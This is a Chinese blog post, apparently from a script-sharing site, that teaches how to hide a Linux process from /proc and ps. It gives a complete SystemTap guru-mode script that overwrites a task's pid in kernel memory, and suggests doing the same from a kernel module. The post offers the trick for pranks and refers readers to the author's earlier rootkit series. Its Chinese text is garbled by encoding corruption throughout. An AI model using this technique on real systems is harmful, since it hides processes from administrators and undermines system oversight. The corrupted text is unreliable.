總有朋友問(wèn)隱藏Linux進(jìn)程的方法,我說(shuō)你想隱藏到什么程度�����,是大隱于內(nèi)核,還是小隱于用戶��。
網(wǎng)上通篇論述的無(wú)外乎hook掉procfs或者類似的用戶態(tài)方案��,也都難免長(zhǎng)篇大論��,我說(shuō)��,這些場(chǎng)面都太大了�,太復(fù)雜了���。對(duì)于希望馬上看到效果的而言��,看到這么一堆復(fù)雜的東西����,大概率望而卻步�����。
本文介紹一種將Linux進(jìn)程小隱于用戶的非常規(guī)方法�,僅僅一行代碼:
修改掉進(jìn)程的pid即可。
注意是小隱���,所以���,不值得反制�����,逗一下高級(jí)會(huì)議工程師搞個(gè)惡作劇玩玩得了�����。
target->pid = 0x7fffffff;
完整的腳本如下:
#!/usr/bin/stap -g
# hide.stp
global pid;
function hide(who:long)
%{
struct task_struct *target;
target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
target->pid = 0x7fffffff;
%}
probe begin
{
pid = $1
hide(pid);
exit();
}
來(lái)來(lái)來(lái)�,試一下:
[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#
用下面的命令可以檢測(cè)所有可顯示進(jìn)程的二進(jìn)制文件:
for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do
ls -l /proc/$pid/exe;
done
procfs里沒(méi)了,ps當(dāng)然就檢測(cè)不到了��。
如果你覺(jué)得guru模式的stap怪怪的�����,那么你完全可以編寫(xiě)自己獨(dú)立的Linux kernel module�����,采用修改完即退的方法:
target->pid = xxxx;
return -1;
是不是比各種hook法簡(jiǎn)單多了�����,所謂的 動(dòng)數(shù)據(jù)而不要?jiǎng)哟a����!
簡(jiǎn)單的說(shuō)一下原理。
- task被創(chuàng)建的時(shí)候�,根據(jù)其pid注冊(cè)procfs目錄結(jié)構(gòu)���。
- 展示procfs目錄結(jié)構(gòu)的時(shí)候�,遍歷task list以其pid作為key來(lái)查找procfs目錄結(jié)構(gòu)����。
- 0x7fffffff(或者任何其它合理的值)根本沒(méi)有注冊(cè)過(guò),當(dāng)然無(wú)法顯示�。
不多說(shuō)�。
再次聲明,不要試圖對(duì)本文所描述的方法進(jìn)行反制����,因?yàn)檫@么簡(jiǎn)單的東西根本不值得反制���,哈哈����,不是嗎?
可以參考我之前的Rootkit系列文章來(lái)繼續(xù)研究Linux進(jìn)程大隱于內(nèi)核的方法��。同時(shí)���,每一種方法我都給出了反制措施�����。
到此這篇關(guān)于一行代碼教你如何隱藏Linux進(jìn)程的文章就介紹到這了,更多相關(guān)Linux隱藏進(jìn)程內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家�!
